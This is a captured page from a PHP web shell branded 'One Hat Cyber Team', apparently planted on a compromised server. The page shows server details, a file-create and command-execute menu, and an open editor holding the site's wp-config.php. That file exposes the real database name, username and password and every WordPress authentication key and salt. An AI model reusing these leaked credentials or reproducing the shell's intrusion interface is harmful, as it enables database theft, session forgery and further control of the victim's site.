One Hat Cyber Team
Your IP :
104.23.197.102
Server IP :
172.67.218.182
Server :
Linux 128-201-239-36.cprapid.com 3.10.0-1160.41.1.el7.x86_64 #1 SMP Tue Aug 31 14:52:47 UTC 2021 x86_64
Server Software :
Apache
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
juscatamarca
/
www
/
Edit File:
wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'juscatamarca_nuevaPoder' ); /** Database username */ define( 'DB_USER', 'juscatamarca_nuevapoder' ); /** Database password */ define( 'DB_PASSWORD', '?hq[95I{M6T.' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'dn^3!N~>0OO2zLYr]@=KwyqI<.qfb)g!Eq@W*5M^-+u]#Q Iyq8T1O%bB+T<D|`c' ); define( 'SECURE_AUTH_KEY', '&/^1x^o/&XslW_Y3zFw/$qy:wIOCoDiz4Pb^&>{s_Sxz||n=0%rnAD&F.fvO>&M~' ); define( 'LOGGED_IN_KEY', 's5adPxUfNi2E!z*!h25hK)X1-0@IH+G;fvU*-rqdq|B3#IJ7*r^tpMqyuIGNT%c9' ); define( 'NONCE_KEY', 'gx`6)D-qcUWIVF3I^49?IMNw# *jnuXfq9%2CuX9=vUC7#kjrrkX;X/ZGbO]&`uo' ); define( 'AUTH_SALT', '~YV|fU8Fc,u8YlQD$()5ego{jx83<*ubx-KjB=dn#z-JG>cr#$q_$RyQ&+EsV-+1' ); define( 'SECURE_AUTH_SALT', 'M+|xbE]C|Gb:4}A;+IrRc/PrSvS 4djG;xK&b>[FvucbGFXfB%>hN(aZBQLF>Ypp' ); define( 'LOGGED_IN_SALT', 'i(=4`XL38(k@B[__qD$?x;8iNJRT?y^566!tP9lOnYx[G/F G1ZClRyR:HocZ:0&' ); define( 'NONCE_SALT', '!7}x~H{h{ja0kj!{?%=8GgU1Vhw-UprqXEY8T{yZd&ZF|UPP0[5_q/h1!yI%$Mp@' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'pd_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define('WP_DEBUG', true); define('WP_DEBUG_LOG', true); define('WP_DEBUG_DISPLAY', false); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Simpan